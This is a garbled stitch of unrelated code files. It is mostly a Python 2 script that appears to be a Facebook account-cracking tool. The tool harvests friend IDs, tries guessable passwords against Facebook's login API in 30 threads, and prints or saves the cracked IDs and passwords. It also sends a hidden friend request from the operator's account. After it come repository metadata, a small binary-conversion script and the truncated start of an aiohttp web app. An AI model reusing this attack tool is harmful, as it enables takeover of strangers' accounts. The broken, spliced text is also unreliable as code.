sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
#### LOGO ####
logo = UsmanKhan
\033[1;98m╔╗─╔╗───────────╔╗╔═╦╗
\033[1;98m║║─║║───────────║║║╔╣║
\033[1;98m║║─║╠══╦╗╔╦══╦═╗║╚╝╝║╚═╦══╦═╗
\033[1;98m║║─║║══╣╚╝║╔╗║╔╗╣╔╗║║╔╗║╔╗║╔╗╗
\033[1;98m║╚═╝╠══║║║║╔╗║║║║║║╚╣║║║╔╗║║║║
\033[1;98m╚═══╩══╩╩╩╩╝╚╩╝╚╩╝╚═╩╝╚╩╝╚╩╝╚╝
\033[1;91m ║══▒═💀═▒═💀═▒═══¤═¤═¤════════════¤═══¤═══¤═══║
\033[1;96m ║✯ 𝕮𝖗𝖊𝖆𝖙𝖔𝖗 𝕸𝖗.𝕽𝖆𝖓𝖆 𝕬𝖆𝖍𝖎𝖑 ║
\033[1;98m ║✯ 𝖄𝖔𝖚𝖙𝖚𝖇𝖊 ☪ Usman Khan ║
\033[1;96m ║✯ 𝕴𝖒 𝖓ø𝖙 𝖗𝖊𝖘𝖕𝖔𝖓𝖘𝖎𝖇𝖑𝖊 𝖋𝖔𝖗 𝖆𝖓𝖞 𝖒𝖎𝖘𝖘 𝖚𝖘𝖊 ║
\033[1;91m ║══▒═💀═▒═💀═▒═══¤═¤═¤════════════¤═══¤═══¤═══║"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\x1b[1;95mPlease Wait \x1b[1;95m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print """
\033[1;97m************************************************
\033[1;96m~ IM NOT RESPONSIBLE FOR ANY MISS USE UsmanKhan ~
\033[1;97m************************************************
\033[1;95m____─▄───────▄█▄───────▄─ Stay Home 💓
\033[1;95m____▐█▌──▄──█████──▄──▐█▌ Stay Safe 💓
\033[1;95m____─█──███▄▄███▄▄███──█─
\033[1;95m____░█░░█▄█▄█▀▒▀█▄█▄█░░█░
\033[1;95m____██▄▄█▄█▄█▒▒▒█▄█▄█▄▄██
"""
jalan("\033[1;92m _ _ _ ")
jalan("\033[1;92m | | (_) | |")
jalan("\033[1;92m _ __ __ _| | ___ ___| |_ __ _ _ __ ZINDABAD✔ ")
jalan("\033[1;97m | '_ \ / _` | |/ / / __| __/ _` | '_ \ ")
jalan("\033[1;97m | |_) | (_| | <| \__ \ || (_| | | | |")
jalan("\033[1;92m | .__/ \__,_|_|\_\_|___/\__\__,_|_| |_|")
jalan("\033[1;92m | | ")
jalan("\033[1;92m |_| ")
CorrectUsername = "Usman"
CorrectPassword = "Khan"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;91m📋 \x1b[1;95mTool Username \x1b[1;91m»» \x1b[1;91m")
if (username == CorrectUsername):
password = raw_input("\033[1;91m🗝 \x1b[1;95mTool Password \x1b[1;91m»» \x1b[1;91m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:Hacker_boss
time.sleep(2)
loop = 'false'
else:
print "\033[1;96mWrong Password"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
else:
print "\033[1;96mWrong Username"
os.system('xdg-open https://m.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[⚡] \x1b[1;91m───Login your new ID───\x1b[1;93m[⚡]' )
id = raw_input('\033[1;93m[+] \x1b[0;34mEnter ID/Email \x1b[1;95m: \x1b[1;95m')
pwd = raw_input('\033[1;95m[+] \x1b[0;34mEnter Password \x1b[1;93m: \x1b[1;93m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Hogai'
os.system('xdg-open https://www.youtube.com/channel/UCsdJQbRf0xpvwaDu1rqgJuA')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mAisa lagta hai apka account checkpoint pe hai")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email ghalat hai")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\x1b[1;91m[!] Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
ots = requests.get('https://graph.facebook.com/me/subscribers?access_token=' + toket)
b = json.loads(ots.text)
sub = str(b['summary']['total_count'])
except KeyError:
os.system('clear')
print"\033[1;91mYour Account is on Checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\x1b[1;92mThere is no internet connection"
keluar()
os.system("clear")
print logo
print "\033[1;36;40m ╔═════════════════════════════════╗"
print "\033[1;36;40m ║\033[1;32;40m[*] Name\033[1;32;40m: "+nama+" \033[1;36;40m║"
print "\033[1;36;40m ║\033[1;34;40m[*] ID \033[1;34;40m: "+id+" \033[1;36;40m║"
print "\033[1;36;40m ║\033[1;34;40m[*] Subs\033[1;34;40m: "+sub+" \033[1;36;40m║"
print "\033[1;36;40m ╚═════════════════════════════════╝"
print " \033[1;32;40m[Type1] \033[1;33;40m‹•.•›Start♥Hacking"
print " \033[1;32;40m[type2] \033[1;33;40m‹•.•›Update"
print " \033[1;32;40m[type0] \033[1;33;40m‹•.•›Logout"
pilih()
def pilih():
unikers = raw_input("\n\033[1;31;40m>>> \033[1;35;40m")
if unikers =="":
print "\x1b[1;91mFill in correctly"
pilih()
elif unikers =="1":
super()
elif unikers =="2":
os.system('clear')
print logo
print " \033[1;36;40m●══════════════════◄►══════════════════●\n"
os.system('git pull origin master')
raw_input('\n\x1b[1;91m[ \x1b[1;97mBack \x1b[1;91m]')
menu()
elif unikers =="0":
jalan('Token Removed')
os.system('rm -rf login.txt')
keluar()
else:
print "\x1b[1;91mFill in correctly"
pilih()
def super():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('clear')
print logo
print " \033[1;97m-•◈•-\033[1;91m> \033[1;91m1.\x1b[1;95m>_<Clone Friend List."
print " \033[1;97m-•◈•-\033[1;91m> \033[1;91m2.\x1b[1;95m>_<Hack Public Accounts ."
print " \033[1;97m-•◈•-\033[1;91m> \033[1;91m0.\033[1;91m>_<Back"
pilih_super()
def pilih_super():
peak = raw_input("\n\033[1;91m^.^Choose an Option>>> \033[1;95m")
if peak =="":
print "\x1b[1;91mFill in correctly"
pilih_super()
elif peak =="1":
os.system('clear')
print logo
print "\033[1;97m•◈•══════•◈•\033[1;91mUsmanKhan\033[1;97m•◈•══════•◈•"
jalan('\033[1;91mGetting IDs \033[1;91m...')
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif peak =="2":
os.system('clear')
print logo
idt = raw_input("\033[1;95m[•◈•] \033[1;91mEnter ID\033[1;95m: \033[1;95m")
print "\033[1;92m•◈•══════••◈•\033[1;91mBlackTiger\033[1;95m•◈•══════••◈•"
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91mName\033[1;95m:\033[1;95m "+op["name"]
except KeyError:
print"\x1b[1;91mID Not Found!"
raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
super()
print"\033[1;91mGetting IDs\033[1;97m..."
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif peak =="0":
menu()
else:
print "\x1b[1;91mFill in correctly"
pilih_super()
print "\033[1;36;40m[✺] Total IDs : \033[1;94m"+str(len(id))
jalan('\033[1;34;40m[✺] Please Wait...')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;32;40m[✺] Cloning\033[1;93m"+o),;sys.stdout.flush();time.sleep(1)
print "\n\033[1;94m ❈ \x1b[1;91mTo Stop Process Press CTRL+Z \033[1;94m ❈"
print " \033[1;92m●══════════════════◄►══════════════════●"
jalan(' \033[1;91mUsman start cloning Wait...')
print " \033[1;92m ●══════════════════◄►══════════════════●"
def main(arg):
global cekpoint,oks
user = arg
try:
os.mkdir('out')
except OSError:
pass #Dev:UsmanKhan
try:
a = requests.get('https://graph.facebook.com/'+user+'/?access_token='+toket)
b = json.loads(a.text)
pass1 = b['first_name'] + '1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass1 + '\n'
oks.append(user+pass1)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b ['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass1 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass1+"\n")
cek.close()
cekpoint.append(user+pass1)
else:
pass2 = b['first_name'] + '123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass2 + '\n'
oks.append(user+pass2)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass2 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass2+"\n")
cek.close()
cekpoint.append(user+pass2)
else:
pass3 = b['last_name']+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass3 + '\n'
oks.append(user+pass3)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass3 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass3+"\n")
cek.close()
cekpoint.append(user+pass3)
else:
pass4 = b['first_name'] + 'Usman'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass4 + '\n'
oks.append(user+pass4)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass4 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass4+"\n")
cek.close()
cekpoint.append(user+pass4)
else:
pass5 = '786786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass5 + '\n'
oks.append(user+pass5)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass5 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass5+"\n")
cek.close()
cekpoint.append(user+pass5)
else:
pass6 = 'Pakistan'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass6 + '\n'
oks.append(user+pass6)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass6 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass6+"\n")
cek.close()
cekpoint.append(user+pass6)
else:
pass7 = b['first_name']+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass7 + '\n'
oks.append(user+pass7)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass7 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass7+"\n")
cek.close()
cekpoint.append(user+pass7)
else:
pass8 = b['last_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass8 + '\n'
oks.append(user+pass8)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass8 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass8+"\n")
cek.close()
cekpoint.append(user+pass8)
else:
pass9 = b['first_name'] + '786'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(user)+"&locale=en_US&password="+(pass9)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
q = json.load(data)
if 'access_token' in q:
x = requests.get("https://graph.facebook.com/"+user+"?access_token="+q['access_token'])
z = json.loads(x.text)
print '\x1b[1;94m[ ✓ ] \x1b[1;92mHack100%💉'
print '\x1b[1;94m[•⚔•] \x1b[1;91mName \x1b[1;91m ✯ \x1b[1;92m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;91mID \x1b[1;91m ✯ \x1b[1;92m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;91mPassword \x1b[1;91m✯ \x1b[1;92m' + pass9 + '\n'
oks.append(user+pass9)
else:
if 'www.facebook.com' in q["error_msg"]:
print '\x1b[1;94m[ ❥ ] \x1b[1;94mCheckpoint'
print '\x1b[1;94m[•⚔•] \x1b[1;94mName \x1b[1;94m ✯ \x1b[1;95m' + b['name']
print '\x1b[1;94m[•⚔•] \x1b[1;94mID \x1b[1;94m ✯ \x1b[1;95m' + user
print '\x1b[1;94m[•⚔•] \x1b[1;94mPassword \x1b[1;94m✯ \x1b[1;95m' + pass9 + '\n'
cek = open("out/super_cp.txt", "a")
cek.write("ID:" +user+ " Pw:" +pass9+"\n")
cek.close()
cekpoint.append(user+pass9)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\033[1;95m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•\033[1;91mUsmanKhan\033[1;95m•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•"
print " \033[1;91m«---•◈•---Developed By Usman Khan--•◈•---»" #Dev:Usman
print '\033[1;93m✅Process Has Been Completed Press➡ Ctrl+Z.↩ Next Type (python2 Tiger.py)↩\033[1;97m....'
print"\033[1;91mTotal OK/\x1b[1;95mCP \033[1;93m: \033[1;91m"+str(len(oks))+"\033[1;93m/\033[1;96m"+str(len(cekpoint))
print """
____________¶¶¶1¶¶_________¶¶¶¶¶¶¶___________
_________¶¶¶111¶¶___________¶¶111¶¶¶¶________
______¶¶¶¶1111¶¶¶____________¶¶¶1111¶¶¶1_____
_____¶¶¶1111¶¶¶¶_____________¶¶¶¶11111¶¶¶____
___¶¶¶11¶1¶1¶¶¶¶___¶¶____¶¶__¶¶¶¶¶1¶1¶1¶¶¶1__
__¶¶¶11¶1¶11¶¶¶¶¶__¶¶¶¶¶¶¶¶__¶¶¶¶¶1¶1¶¶11¶¶1_
_¶¶¶11¶¶1¶11¶¶¶¶¶¶__¶¶¶¶¶¶_¶¶¶¶¶¶¶1¶¶1¶¶1¶¶¶_
¶¶¶¶1¶¶11¶¶1¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶1¶¶1¶¶¶1¶¶¶
¶¶¶11¶¶11¶¶1¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶1¶¶¶1¶¶¶1¶¶¶
¶¶¶1¶¶¶¶1¶¶¶1¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶11¶¶¶1¶¶¶11¶¶
_¶¶11¶¶¶1¶¶¶¶1¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶1¶¶¶1¶¶¶¶1¶¶¶
_¶¶¶1¶¶¶¶1¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶1¶¶¶¶1¶¶1
__¶¶1¶¶¶¶¶¶¶¶__¶¶¶¶¶¶¶¶¶¶¶¶¶¶¶__¶¶¶¶¶¶¶¶1¶¶¶_
___¶¶1¶¶¶_¶¶_______¶¶¶¶¶¶¶¶______¶¶¶¶¶¶¶¶¶¶__
____¶¶¶¶____________¶¶¶¶¶¶___________¶¶¶¶____
______¶¶¶__________¶¶¶__¶¶¶__________¶¶______
_______¶¶¶_________¶______¶_________¶¶¶______
Checkpoint ID Open After 24 Hours
•\033[1;95m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.
: \033[1;91m ....Usman Khan....... \033[1;95m :
•\033[1;95m◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•▬ ▬ ▬ ▬ ▬ ▬ ▬•◈•.'
Facebook
\033[1;91m Shan Noor"""
raw_input("\n\033[1;95m[\033[1;91mBack\033[1;95m]")
menu()
if __name__ == '__main__':
login()
|
[
"noreply@github.com"
] |
Raheemboss0071.noreply@github.com
|
a6afa95b502e530d2d924043fbd73f7a2656adb5
|
7238007ee7618cac13258602900017897c960bf5
|
/toBinary.py
|
f046ab383b306a5550371e62ac2391c29f9a286c
|
[] |
no_license
|
xinwangmath/PlantedMotifSearch
|
e2e7a298122a43e73289a277abd3b905b5b30033
|
5688117a5b0c569fd40043a4cd37cf56cd69a113
|
refs/heads/master
| 2020-05-17T22:49:56.507813
| 2015-03-10T14:25:49
| 2015-03-10T14:25:49
| 31,961,910
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
def toBinary(a, n):
    """Return the binary representation of a non-negative integer a, zero-padded to n bits.

    If a does not fit in n bits, the full (longer) binary string is returned
    unchanged, matching the original behavior.

    :param a: non-negative integer to convert
    :param n: minimum width of the result in bits
    :return: string of '0'/'1' characters, at least n characters long
    """
    # str.zfill left-pads with zeros up to width n and leaves longer strings alone,
    # which is exactly what the original manual padding did.
    return bin(a)[2:].zfill(n)
# end of function definition #
# Script entry point. NOTE(review): Python 2 syntax (`raw_input`, print
# statement) — this file will not run under Python 3 without porting.
if __name__ == '__main__':
	a = (int)(raw_input("please enter an integer"));
	n = 10;
	print toBinary(a, n);
|
[
"ziyuexw1@gmail.com"
] |
ziyuexw1@gmail.com
|
c19708c6bf36cf854558739141da8850d7987462
|
f5183c888d7335c52f956ee12bafe6be4e3473d0
|
/www/app.py
|
812b413cb39ef5984b4a98b94dcc94d0732ad589
|
[] |
no_license
|
ftong9224/awesome-python3-webapp
|
3e106f7930895708ff8d999c2ceea9771966e4cb
|
0ee669662fdcaf3fdcf9d88de354da02994d2bed
|
refs/heads/master
| 2021-09-02T09:12:43.156922
| 2018-01-01T09:31:18
| 2018-01-01T09:31:18
| 114,324,161
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,905
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 _*_
__author__ = 'Ftong Tong'
'''
async web application
'''
import logging;logging.basicConfig(level=logging.INFO)
import asyncio, os, json, time
from datetime import datetime
from aiohttp import web
from jinja2 import Environment, FileSystemLoader
from config import configs
import orm
from coroweb import add_routes, add_static
from handlers import cookie2user, COOKIE_NAME
def init_jinja2(app, **kw):
    """Build the Jinja2 environment and attach it to the app as '__templating__'.

    Keyword arguments override the default delimiters/flags; 'path' overrides
    the template directory (default: ./templates next to this file); 'filters'
    is a mapping of extra template filters to register.
    """
    logging.info('init jinja2...')
    opts = {
        'autoescape': kw.get('autoescape', True),
        'block_start_string': kw.get('block_start_string', '{%'),
        'block_end_string': kw.get('block_end_string', '%}'),
        'variable_start_string': kw.get('variable_start_string', '{{'),
        'variable_end_string': kw.get('variable_end_string', '}}'),
        'auto_reload': kw.get('auto_reload', True),
    }
    template_dir = kw.get('path', None)
    if template_dir is None:
        # Default to the 'templates' directory alongside this source file.
